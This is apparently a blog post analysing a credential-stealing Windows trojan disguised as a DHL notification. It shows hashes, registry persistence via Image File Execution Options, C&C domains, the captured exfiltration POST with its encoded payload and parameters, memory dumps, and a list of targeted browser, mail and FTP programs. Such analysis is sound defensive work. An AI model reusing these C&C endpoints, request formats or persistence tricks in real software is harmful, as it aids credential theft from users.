layout: post

title: Another malware analysis

Also known as DHL_Notification.exe

• Tries to steal credetials from different applications
• Dumb implementation
• No obfuscation, only minor anti-debugging stuff
• All C&C servers are down

Static Analysis

% md5sum DHL-Notification.exe
bb4ccfaf18135cc5f8790f692bc06507  DHL-Notification.exe
% file DHL-Notification.exe
DHL-Notification.exe: PE32 executable (GUI) Intel 80386, for MS Windows
% clamscan DHL-Notification.exe
DHL-Notification.exe: Trojan.Bublik-7 FOUND
% yara -r ~/Downloads/Analysis/yara-rules/packer.yara DHL-Notification.exe

• Virustotal classifies it as malware, type trojan
• PEiD finds no sign of a packer and no crypto signatures
• WIN32 GUI application
• Compiled on 2012/07/04 which seems legit
• All section names are normal and the virtual size and size of disk of the .text section does not differ
• Resource section contains version information only. Fake company information is ThermalTake

It uses the following DLLs

• GDI32
• USER32 (including functions to manipulate windows)
• KERNEL32 (locking stuff and GetProcAddress)

A string search does not reveal any useful or yet unknown information, there might be some decoded strings.

Dynamic Analysis

First dynamic run was conducted using the following tools:

• CaptureBAT
• Process Explorer
• Maltrap

Judging from the log the malware is not packed, although it checks old-school style (IsDebuggerPresent()) if a debugger is present.

Registry Changes

Quite a lot, here are the interessting ones:

"22/8/2012 9:10:18.6","registry","SetValueKey","C:\WINDOWS\system32\csrss.exe","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe\Debugger"
"22/8/2012 9:10:18.6","registry","SetValueKey","C:\WINDOWS\system32\csrss.exe","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\AEFB0F09"
"22/8/2012 9:10:18.186","registry","SetValueKey","C:\WINDOWS\explorer.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1609"
"22/8/2012 9:10:18.236","registry","SetValueKey","C:\WINDOWS\explorer.exe","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\AEFB0F09\CEC1"

File System

The malware saves a copy of itself under c:\windows\system32\. It chooses a different, inconspicuous every time:

"3/8/2012 2:4:6.748","file","Write","C:\WINDOWS\system32\csrss.exe","C:\WINDOWS\system32\defw.exe"
"22/8/2012 9:10:16.994","file","Write","C:\WINDOWS\system32\csrss.exe","C:\WINDOWS\system32\winiplay.exe"

It creates a batch file. The prefix of the name is also randomized:

C:\DOCUME~1\admin\LOCALS~1\Temp\eb42_appcompat.txt
C:\DOCUME~1\admin\LOCALS~1\Temp\b0d7_appcompat.txt

Network

The malware sends a number of DNS queries. If the domain does not resolve the malware appends the local domain and tries again:

 admixco.com
 buwplarof.servegame.com
 buwplarof.servegame.com.localdomain
 ciklaorejom.my03.com
 lemonmedia.net
 lemonmedia.net.localdomain
 maxibass.com
 maxibass.com.localdomain
 mohdolibarl.sytes.net
 mohdolibarl.sytes.net.localdomain
 wpad.localdomain

• It checks if a local Web Proxy Autodiscovery Protocol (WPAD) server is available. It connects and receives the proxy configuration.

• It resolves google.com and downloads the index site.

• The first contacted domain admixco.com is unreachable, thus, the malware queries the local www-cache and sends a HTTP POST to the www-cache

• Content

  POST http://admixco.com/was/u.php HTTP/1.0 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: admixco.com Content-Length: 320 Proxy-Connection: Keep-Alive Pragma: no-cache

with the following payload

NJHPk3e/a8jCaJGgV4cYy1Asw5AOaFX3N42pIS0ujZ1mS5yDc+gnopBF0ywlvA3RY5A9LH9hIq2D/hwZVnxKn1W47NrBxm+0xcF5NvUnhKnBZ9ONW2LcdJQWT4BKcufEp8N+fz9IDwjW1ArXpIhI17VYc+dtmzjLwBylH0dvEVCaxyUxVtG1HHZXvO8LFq0EeerN/OWDeEcKHyvMdeEk81Kkd36ar+nRC6MoetaLpEfplv+QoEYVxU56d90WL36UCVxwUAH6d1dxcWjP0VEVQv895zF5zNrK6/RFWGoQ9LiRnXgbkXaskz6QvXvU4m1F%

The same happens with three further domains, the payload stays the same.

The first server that is reachable is ciklaorejom.my03.com and points to Twitter :)

% host ciklaorejom.my03.com
ciklaorejom.my03.com has address 199.59.148.10
ciklaorejom.my03.com mail is handled by 10 ciklaorejom.my03.com.
ciklaorejom.my03.com mail is handled by 20 ciklaorejom.my03.com.
% host 199.59.148.10
10.148.59.199.in-addr.arpa domain name pointer r-199-59-148-10.twttr.com.

The local web cache responds:

HTTP/1.0 404 Not Found
Date: Fri, 03 Aug 2012 09:35:18 GMT
Status: 404 Not Found
Content-Length: 11452
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-Content-Type-Options: nosniff
Expires: Tue, 31 Mar 1981 05:00:00 GMT
X-MID: 4ef3da719be6c02853a80b4d9b27a8cd8aa72659
X-Frame-Options: SAMEORIGIN
X-Transaction: 72530971642461f6
Pragma: no-cache
Last-Modified: Fri, 03 Aug 2012 09:35:18 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: k=10.34.234.116.1343986518407555; path=/; expires=Fri, 10-Aug-12 09:35:18 GMT; domain=.twitter.com
Set-Cookie: guest_id=v1%3A134398651841982354; domain=.twitter.com; path=/; expires=Sun, 03-Aug-2014 21:35:18 GMT
Set-Cookie: _twitter_sess=BAh7CSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCJTJ1us4AToMY3NyZl9p%250AZCIlOTRkYTM4ODViNmVjMGE3OWRkYWMxNjMyODVhMGU1NTg6B2lkIiU0YTYz%250AZTk5MzRhNzgxNjUzNTFlZTE4NzU4ZjYzOWE5OQ%253D%253D--98e66c327f91c7fb240ccde2b86c8848948643eb; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Server: tfe
X-Cache: MISS from www-cache
X-Cache-Lookup: MISS from www-cache:3128
Via: 1.0 www-cache (squid/3.1.10)
Connection: keep-alive

Shortly after, the 404 comes from twitter. The malware repeats the above actions over and over.

Virtual Memory Analysis

Process Hiding

The malware hooks in the svchost.exe process.

Process: SVCHOST.EXE Pid: 856 Address: 0x2440000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 88, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x02440000  4d 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00   MZ..............
0x02440010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x02440020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x02440030  00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00   ................

0x2440000 4d               DEC EBP
0x2440001 5a               POP EDX
0x2440002 0000             ADD [EAX], AL
0x2440004 0000             ADD [EAX], AL
[...]

The dumped process has the md5sum 560e7cf3e91e5c800519b1fecca7b4f4. It is known by virustotal.com as Trojan.Heur.GM.

It it is also hooked into explorer.exe. The dumped process has the MD5 sum a85033df66d1a2ff23e45d8b8bb2aa71. It is known by virustotal.com also as Trojan.Heur.GM.

Process: EXPLORER.EXE Pid: 1492 Address: 0xbb0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x00bb0000  ea 82 1c 77 05 8b ff 55 8b ec e9 e0 82 61 76 00   ...w...U.....av.
0x00bb0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00bb0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00bb0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

0xbb0000 ea821c77058bff   JMP FAR 0xff8b:0x5771c82
0xbb0007 55               PUSH EBP
0xbb0008 8bec             MOV EBP, ESP
0xbb000a e9e0826176       JMP 0x771c82ef
0xbb000f 0000             ADD [EAX], AL
[...]

Process Memory Dump

I dumped the complete memory of both suspected processes. A quick search for strings showed that the malware indeed infected the processes:

% strings -a 856.dmp| uniq

C:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\
ADMIXCO.COM
e.com/
:2012080320120804:
Visited:
C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\
C:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
C:\WINDOWS\system32\config\systemprofile\Cookies\index.dat
C:\WINDOWS\system32\config\systemprofile\Cookies\
C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\
C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
C:\WINDOWS\system32\config\systemprofile\Cookies\
C:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\
C:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\MSHist012012080320120804\
ost.exe
Inet
AAAA
admixco.com
google.com
ETag: "1e18da-415-4c3ede86d8640"
Content-Length: 1045
Content-Type: text/plain
~U:system
tent-Type: text/plain
Ranges: bytes
Content-Length: 1045
Connection: close
Content-Type: text/plain
 close
Content-Type: text/plain
lain
 close
Content-Type: text/plain
-Type: text/plain
pe: text/plain
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
re\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\   
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
QmwRgYVXGDldF1QRlwxbJoE+qeBs64UcAS9GBo7TPICpFevOk5kqOv/BdYzVmjBnQPski6HAm1a9FNcsuNkj7CXndN9n47SPIlhvXUUNDFHlQZQNpAjDkLdJAZFCrPtjZopQO9zrKQMZzJ8l+gIyziAe27CuRubmnW+Jcdyb/sf3Jta/LhWGmVmektBQoSd7rG5CNc6WkAXO8HIWiTQNFwDPPplY9gbJ0z+YGdASSIxiH6bvC2gMavRbUeHXzb1GUFFGKtC88O7m8kwMpwaLLLItBWRiQj1QCPKvgzSQ1csGiQBswOpiNz1Nv+1vIqOM

Quite a number of interessting executables

thebat.exe
msimn.exe
iexplore.exe
explorer.exe
myie.exe
firefox.exe
mozilla.exe
avant.exe
maxthon.exe
OUTLOOK.EXE
ftpte.exe
coreftp.exe
filezilla.exe
TOTALCMD.EXE
cftp.exe
FTPVoyager.exe
SmartFTP.exe
WinSCP.exe
opera.exe
navigator.exe
safari.exe
chrome.exe

The URLs of the C&C servers

admixco.com/was/u.php
maxibass.com/was/u.php
lemonmedia.net/was/u.php
ciklaorejom.my03.com/was/u.php
buwplarof.servegame.com/was/u.php
mohdolibarl.sytes.net/was/u.php
tver=201207040552&vcmd=0&osver=5.1.2600+Service+Pack+3&ipcnf=10.0.2.15+&sckport=0&cmobj=GZRX&SHID=A000001&email=

POP3 stuff

POST
USER
PASS